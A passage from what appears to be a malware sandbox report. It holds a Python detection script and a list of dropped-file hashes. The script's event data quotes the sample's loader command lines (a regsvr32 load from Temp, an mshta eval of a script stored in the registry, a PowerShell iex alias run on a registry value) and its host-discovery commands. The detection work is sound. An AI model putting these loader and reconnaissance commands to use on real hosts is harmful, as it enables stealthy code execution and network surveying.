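workstation, nltest /domain_trusts and net view /all, each appended to %TEMP%\343A.bin1 and separated by echo -------- lines; the final cmd /U /C type rewrites the collected text as UTF-16 into 343A.bin and deletes the original. The script below is an added example, not anything the sandbox produced, showing how those two stages look as detection logic over process-creation events. EVENTS is constructed from a subset of the command lines in the tree; the rule names, regular expressions and the five-distinct-tools threshold are this example's own choices.

```python
"""Detection logic for the loader chain and the discovery burst in the tree above.

Added example, not the sandbox's own logic. EVENTS is constructed from a subset of
the command lines in the process tree (pid, parent pid, image basename, command
line). Rule names, regexes and the five-tool threshold are this example's own.
"""
import re
from collections import defaultdict

MSHTA_CMD = (
    r'''"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lp3h='wscript.shell';'''
    r'''resizeTo(0,2);eval(new ActiveXObject(Lp3h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft'''
    r'''\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"'''
)
PS_CMD = (
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name muwvla -value gp; '''
    r'''new-alias -name pimbks -value iex; pimbks ([System.Text.Encoding]::ASCII.GetString((muwvla '''
    r'''"HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))'''
)
T = r"C:\Users\Admin\AppData\Local\Temp\343A.bin1"   # staging file used by the survey
EVENTS = [  # (pid, ppid, image, cmdline), transcribed from the tree
    (3256, 3116, "regsvr32.exe", r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\aa856dedda137f7419ecc36766ed74e3.dll"),
    (2952, 3116, "mshta.exe", MSHTA_CMD),
    (4380, 2952, "powershell.exe", PS_CMD),
    (4244, 3116, "cmd.exe", rf'cmd /C "wmic computersystem get domain |more > {T}"'),
    (4208, 3116, "cmd.exe", rf'cmd /C "systeminfo.exe > {T}"'),
    (832, 3116, "cmd.exe", rf'cmd /C "net view >> {T}"'),
    (556, 3116, "cmd.exe", rf'cmd /C "nslookup 127.0.0.1 >> {T}"'),
    (4296, 3116, "cmd.exe", rf'cmd /C "tasklist.exe /SVC >> {T}"'),
    (4680, 3116, "cmd.exe", rf'cmd /C "driverquery.exe >> {T}"'),
    (4928, 3116, "cmd.exe", rf'cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> {T}"'),
    (3196, 3116, "cmd.exe", rf'cmd /C "net config workstation >> {T}"'),
    (1668, 3116, "cmd.exe", rf'cmd /C "nltest /domain_trusts >> {T}"'),
    (2688, 3116, "cmd.exe", rf'cmd /C "net view /all /domain >> {T}"'),
]


def rule_regsvr32_temp_dll(img, cl):
    """regsvr32.exe silently registering a DLL dropped under %LOCALAPPDATA%\\Temp."""
    return img == "regsvr32.exe" and re.search(r"/s\s+\S*\\AppData\\Local\\Temp\\", cl, re.I) is not None


def rule_mshta_registry_script(img, cl):
    """mshta.exe given an inline HTA that eval()s a script read back from the registry."""
    low = cl.lower()
    return img == "mshta.exe" and "about:<hta:application>" in low and "regread(" in low


def rule_powershell_registry_iex(img, cl):
    """powershell.exe aliasing iex and feeding it a value from HKCU\\Software\\AppDataLow."""
    return (img == "powershell.exe" and "appdatalow" in cl.lower()
            and re.search(r"new-alias\s+-name\s+\w+\s+-value\s+iex\b", cl, re.I) is not None)


LOADER_RULES = [rule_regsvr32_temp_dll, rule_mshta_registry_script, rule_powershell_registry_iex]


def loader_hits(events):
    """Return (pid, rule name) for every event that trips a loader-chain rule."""
    return [(pid, rule.__name__) for pid, _ppid, img, cl in events
            for rule in LOADER_RULES if rule(img.lower(), cl)]


# One regex per discovery tool; the name is what gets counted, so repeated runs of
# the same tool (net view, net view /all, net view /all /domain) count once.
DISCOVERY = {name: re.compile(rx, re.I) for name, rx in {
    "wmic computersystem": r"\bwmic\s+computersystem\b",
    "systeminfo": r"\bsysteminfo\b",
    "net view": r"\bnet\s+view\b",
    "net config": r"\bnet\s+config\b",
    "nltest": r"\bnltest\b",
    "tasklist": r"\btasklist\b",
    "driverquery": r"\bdriverquery\b",
    "reg query Uninstall": r"\breg(\.exe)?\s+query\b.*CurrentVersion\\Uninstall",
    "nslookup": r"\bnslookup\b",
}.items()}
OUTFILE_RE = re.compile(r'>>?\s*(?P<path>[A-Za-z]:\\[^"&\s]+)')  # redirect target, if any


def discovery_bursts(events, min_tools=5):
    """Group discovery commands by (parent pid, redirect target) and report groups that
    use at least min_tools distinct tools: the shape of a scripted host survey."""
    seen = defaultdict(set)
    for _pid, ppid, _img, cl in events:
        tools = {name for name, rx in DISCOVERY.items() if rx.search(cl)}
        if not tools:
            continue
        m = OUTFILE_RE.search(cl)
        out = m.group("path").lower() if m else None
        seen[(ppid, out)] |= tools
    return [(ppid, out, sorted(tools)) for (ppid, out), tools in seen.items()
            if len(tools) >= min_tools]


if __name__ == "__main__":
    for pid, rule in loader_hits(EVENTS):
        print(f"pid {pid}: {rule}")
    for ppid, out, tools in discovery_bursts(EVENTS):
        print(f"parent {ppid} ran {len(tools)} discovery tools into {out}: {', '.join(tools)}")
```

The loader rules fire on three processes here (regsvr32.exe 3256, mshta.exe 2952, powershell.exe 4380), and the survey rule groups nine distinct tools under parent 3116 writing to the same 343A.bin1 file. Grouping by the redirect target is what keeps the rule tight: any one of these commands is routine on an admin workstation, but nine different ones funnelled by the same parent into one temp file within a single run is not. On a real host the events would come from Sysmon event 1 or Security 4688 with command-line logging enabled, and the parent would be an Explorer.EXE that never spawns cmd.exe in normal use.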
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize: 65KB
MD5: 2be250533505ac5c4e288f7281b6bfc4
SHA1: d88f1fc0e989584cf390a02a676b58d9c3d5acbb
SHA256: f6b33d6635d0bb5bc9d9b004ab8e9938823edb4093653cd0deb4c8e16e6c4b65
SHA512: 37725511d4340a4e30c452f37b1a8e58ee4c5f22e4aa6b77b5c6ea1b2daf9ae42582bb2db33f20f94ee767bcd014456a8bdf0bdd7fdb54f13b9f7d93ec87e1b8
-
Filesize: 44B
MD5: f7aea2435aa888b709ca20f816c33bfd
SHA1: 38717c9a73b5f8bd399839cbe0aa57518427e758
SHA256: f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5
SHA512: 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232
-
Filesize: 0B (the report gives no size; these are the hashes of empty input)
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize: 2KB
MD5: 92f52356fda8a51244df2c14828bd930
SHA1: 335bedf66b420029da09eca8d9ed22cae93fdd64
SHA256: ba0aeb1efb309fe38822f7bb479a4ba9e8558b6a02a4129a21a9a960b81f0b69
SHA512: dbe7d8d2c0779995437e8c51e7b431593aa2678450da30b9cc97e527e2142f585d486b2c3056b210e4e2c84bd2a1d03588089a189ff29150b20b99c17744ad79
-
Filesize: 2KB
MD5: 7266e6c1b7501456d74c5ac4bcaf2352
SHA1: 1aee2a2a73cb5371e126e907eeed12f2ce11e0a3
SHA256: dc0fb0044edd0389e9993b3c925f55309a38653131bf53fcb18dc9d93d8d6ac1
SHA512: 4dc00e2a88e1b483ddc879e6da6adee83890f3691cd9842bfaf8d48eec0171361f2adccc24773bc2cabe58f9e70debdffc0730043be073c18d9ff9e4a2fb5f7b
-
Filesize: 2KB
MD5: 837de7e11db720fff66b7f7181271c0f
SHA1: 856a8ae5bde24ce4b8f0c27b62222e355165c4b8
SHA256: 249ec97ae002bdfea9b65ba8e1e0644db23ba5e0a2f312659446ac53c71bb852
SHA512: 17ea0edf2b4342310c28e097eaf4a4df31bee807d2a75c196d5f299a060dfa17e152e6f03cc23262fdea3e413bc12412dab62cd563b16d1210dc9e07b7f6e04e
-
Filesize: 2KB
MD5: a270d63c9c2ce75338beadd46651e418
SHA1: 78d67614545c3bfa349fb671d45a0cce2ae134b7
SHA256: 1a606937fdabcc8d148b3319e8f515f0d204e0d4380045daf93f55967b3cfebc
SHA512: e44bb6aedc4fa8c87e1d654ae0aaf33618a5867c99dfaa8f40a64c6217bdbe554faa6aa804785aa706cf40f19f9291feb2af40ab283c6990da1d7b8c64a5de99
-
Filesize: 2KB
MD5: a270d63c9c2ce75338beadd46651e418
SHA1: 78d67614545c3bfa349fb671d45a0cce2ae134b7
SHA256: 1a606937fdabcc8d148b3319e8f515f0d204e0d4380045daf93f55967b3cfebc
SHA512: e44bb6aedc4fa8c87e1d654ae0aaf33618a5867c99dfaa8f40a64c6217bdbe554faa6aa804785aa706cf40f19f9291feb2af40ab283c6990da1d7b8c64a5de99
-
Filesize: 9KB
MD5: 3459e1fc227fcaa6fad8dc2e10d84fd2
SHA1: bb30b7d6ee1d2d258dbeee48b1a824d12209fbe9
SHA256: 11dab6c92b5a465fd9f6c2ef2edec77a5831f20cdca9534c2c34aadddf48924d
SHA512: ff974d3aaf6597ad517f407ee3c09180152e0bf392130a803b3bb842caef5344217600825418b9c473ecc4e387c34b8d4f00c08c0f7804c0fae726bb3b9d6d03
-
Filesize: 9KB
MD5: 3459e1fc227fcaa6fad8dc2e10d84fd2
SHA1: bb30b7d6ee1d2d258dbeee48b1a824d12209fbe9
SHA256: 11dab6c92b5a465fd9f6c2ef2edec77a5831f20cdca9534c2c34aadddf48924d
SHA512: ff974d3aaf6597ad517f407ee3c09180152e0bf392130a803b3bb842caef5344217600825418b9c473ecc4e387c34b8d4f00c08c0f7804c0fae726bb3b9d6d03
-
Filesize: 35KB
MD5: 1368e996c316498973c786ace3f42f87
SHA1: 8d7f1dbe9e9dbf02aace07ed320b47a7b7a01d0a
SHA256: b4b662d4b823e3af2af59f02ce0f6653fa92c6e27d1146cc225d9fc6524b1acc
SHA512: 60a31c4247e4ea9aab62b69dcdf4c80bc72a259950bd47d930dbdb51ac6b52cad4620ba62ee08e4f639bb52ab50beb580039ac6674fd4c368c73882d217ded9b
-
Filesize: 35KB
MD5: 1368e996c316498973c786ace3f42f87
SHA1: 8d7f1dbe9e9dbf02aace07ed320b47a7b7a01d0a
SHA256: b4b662d4b823e3af2af59f02ce0f6653fa92c6e27d1146cc225d9fc6524b1acc
SHA512: 60a31c4247e4ea9aab62b69dcdf4c80bc72a259950bd47d930dbdb51ac6b52cad4620ba62ee08e4f639bb52ab50beb580039ac6674fd4c368c73882d217ded9b
-
Filesize: 64KB
MD5: 02fdc24f3a1c19cfa74983fae1cf014a
SHA1: 6d7eaa6f24f588343b7d69cf2f1ec9e6d2295462
SHA256: 0eb080f7a289e78baf814518fc45c408c00f7a2f69af9c217e04d5476ea5c400
SHA512: d44444ff9e85e1c3c308f09cff5c7e94795df544df186e5c5cf80b02ce318726820ff5c2642f9951816de9d9af2aa91c0e5edbac03d66a3fc3bee687084e61ea
-
Filesize: 64KB
MD5: 02fdc24f3a1c19cfa74983fae1cf014a
SHA1: 6d7eaa6f24f588343b7d69cf2f1ec9e6d2295462
SHA256: 0eb080f7a289e78baf814518fc45c408c00f7a2f69af9c217e04d5476ea5c400
SHA512: d44444ff9e85e1c3c308f09cff5c7e94795df544df186e5c5cf80b02ce318726820ff5c2642f9951816de9d9af2aa91c0e5edbac03d66a3fc3bee687084e61ea
-
Filesize: 65KB
MD5: 1474718875d6962a725dd676ecc738c6
SHA1: 7a63d76d07df9e7088b290a8d13250e1e5ddd490
SHA256: 8fee96446f545c3c25c84e48d89385f5a6dda65c2c31b674b83ba1ef9fd3169d
SHA512: cfcb35a7a043c40155ef99c8822f3447e1b6a602bfed159208a77b1c91cc46b27ca074338f08e8a90edf852dc38cd2113dda0fce882ea44dfbab84d3fbe1d51a
-
Filesize: 65KB
MD5: 1474718875d6962a725dd676ecc738c6
SHA1: 7a63d76d07df9e7088b290a8d13250e1e5ddd490
SHA256: 8fee96446f545c3c25c84e48d89385f5a6dda65c2c31b674b83ba1ef9fd3169d
SHA512: cfcb35a7a043c40155ef99c8822f3447e1b6a602bfed159208a77b1c91cc46b27ca074338f08e8a90edf852dc38cd2113dda0fce882ea44dfbab84d3fbe1d51a
-
Filesize: 65KB
MD5: d012fdba3c4261fd829d348c7c79ab1c
SHA1: c62597b41f59102ada4bbfb159887416e4e11db9
SHA256: eadaa711062014ba34ba6a2beb9552a73f6d31bcc688f47103c764ca3a53875a
SHA512: 78d5b06eb4045545fe9f18590baf7c82e10a37404a1ab546c915ea1be4a8a2add9d67e9c9c266b708edd74e59cbf3e4c0d6954ae828ccd4cdde910f7ca425495
-
Filesize: 65KB
MD5: 37144bba0fcf98f8105431732787e0b8
SHA1: a5c353555e6eae1fdee6580cf84f81dcc6e344f9
SHA256: 7b5815a1087b942c9e0cde5d481023b238a6a88df54764d89aeba97c7a9936c7
SHA512: 8e97b9f4a2e7f45eac8f27ae5a669b7deceab17d81b7dcafc25d9c51ab8cecd1c0693c52da16c866312a4593bf8e7fdcd2abaf012fd3dbec63a55c0da0437cf8
-
Filesize: 65KB
MD5: b5b5e79eb35ffaf034e96932062abb70
SHA1: ccdf90bd4e989879eff01ea7f6f8247548575228
SHA256: 75d3a33521051412c7f2a50ec7e19f596f0971bb8bbd8df6c6a2f657c8e5921a
SHA512: 4fddabf2148762d84f6f9edd7b28738b7082f46af5d9b4cf9d9e5408d09aaddb5dfa76bf04f192e67a8ff5e87915d11f330a911654ad0b5109374372d686dfad
-
Filesize: 65KB
MD5: 2be250533505ac5c4e288f7281b6bfc4
SHA1: d88f1fc0e989584cf390a02a676b58d9c3d5acbb
SHA256: f6b33d6635d0bb5bc9d9b004ab8e9938823edb4093653cd0deb4c8e16e6c4b65
SHA512: 37725511d4340a4e30c452f37b1a8e58ee4c5f22e4aa6b77b5c6ea1b2daf9ae42582bb2db33f20f94ee767bcd014456a8bdf0bdd7fdb54f13b9f7d93ec87e1b8
-
Filesize: 1KB
MD5: c61bb66419dd65cf5ad9f747f26d4db4
SHA1: 1837614b7a0b5f461fe28b2ba755e535a21c2996
SHA256: f3f58e80271e86370440a5851d1b4edea44b5eea4a4e758452bee2f850bbb0ae
SHA512: af87507594158784b4bdcb549b50376120e5b8e4e756267752bd6b3750ba773424bec60870058becfe74ec13fa38043ee26846afe90944b018b538b9dfe268b3
-
Filesize: 1KB
MD5: 4c9e24c8ad5b4da6b1ffc13bce37b3c7
SHA1: 71e51eb055b3a43666eba00d6f16d67534ee6c77
SHA256: b9682cfee63e97bbef9a43d5029d79b8e69c4a1667b48e852ffe9d3778167175
SHA512: 69b2885d5ab9258310ee707de32d57e5ffe962ead72df23732ad532048437bf4972faa0148176970b60a5d86027add8f253dd610203d86b19aa1dedacb9e0df0
-
Filesize: 3KB
MD5: f39620c5773a3b2aa5d5befdd2c31124
SHA1: 0aeab41edec2c360b2438dcdf95e3830a9149aef
SHA256: be17263265fd35655c213e23f29959df22b6d5357b54c435b66a9047459c9322
SHA512: ff6e19217b79b841da43888b40b8df924c889c04311a3b20176417a2e0dfe6f8709ac242eeb0f9044f5cc87218233663b55c1fa619d384e3f1bc0f309c1a31c3
-
Filesize: 3KB
MD5: bcb55518005d3f22cc8b6f9c1f9462b1
SHA1: b853cc5e1f68fa59e272197923c92cd2e2e69405
SHA256: e3b73c85f38115f41b56be783d4452b0932c026b535cefd6562d8737c190cba9
SHA512: 5732aa781fe02d9e2f09a50d962a0a932d325ea3fc86f31cdfe6a937ac1bb88bb5c364142f849d7e6b82db7e2ed520b1bf9f81d6887407c7fd5f9f4d8215bc32
-
Filesize: 652B
MD5: c1acc698bdec8241f5b0e61fa805b79c
SHA1: 4cc0b5f5f6413d4ccca23fd8584239ffac44b881
SHA256: eae014f0f50d027fbf549bc41ce9e0c674488c1c8fee8120034e6343807dff60
SHA512: 3448bfdc44384fecc3fe056c3e9b79d76eb52605634414a2a2327eed62056416687e341e075a3ed7334d666edb2c990835aa2641c7a07978ebf83d0fc9b5b53c
-
Filesize: 400B
MD5: aca9704199c51fde14b8bf8165bc2a4c
SHA1: 789b408ccad29240bd093515cbd19a199ad2c1c8
SHA256: cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27
SHA512: a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6
-
Filesize: 369B
MD5: beba16e59f02318fd5747b8d7be8ec2f
SHA1: 5c9a49f37d0f4e296364c45358c9e51be664e9cc
SHA256: ed4a7645909f7cda9edce8a4f3d75bdde28f2ab0e314c71390207c00918c1271
SHA512: f65cdbd3ba37ff1860bc5531ff815a2859b93c52a64b47e7215d3926b3fbedbbbf3077efbab028dbcefb52cc6da85d3097b293c714893635d280fb0a7834fd9e
-
Filesize: 652B
MD5: 76bd946bba0aaa6c3953f08a7a52873c
SHA1: de1d778b2548b3a67fc6b430ca286a5ae07d3020
SHA256: 0c535950015294e9f36f037b13c76d45f7aa6cf7319b52718c4323e7b5d55641
SHA512: 0ce5d8ef4686b7273301cdfcc2229a0bcd00a996d3172e3c4032de042f4fad6b9d76515dcf7ad74236d7e248fdf9c043d39b776551db7ad3515a0613884c9787
-
Filesize: 410B
MD5: 9a10482acb9e6952b96f4efc24d9d783
SHA1: 5cfc9bf668351df25fcda98c3c2d0bb056c026c3
SHA256: a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377
SHA512: e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28
-
Filesize: 369B
MD5: e2bc0cd94a1905450fe7c4665accfbe0
SHA1: 5a71da3c6bea5105bb934594b7f0bf41f31bd30f
SHA256: 5b67365b0f494a631fcd9560ff30c6e793cec9ad9553762c9c5761e998aa94c9
SHA512: 759d5cd8f05fac682d45f5ed8141bd2a4a441d5b4cf2f09afed20cb3f6d9a7fdbff3e628307cceaa47ef124a499d9f3d616130bd3354d238b0d7b9b66dca7a26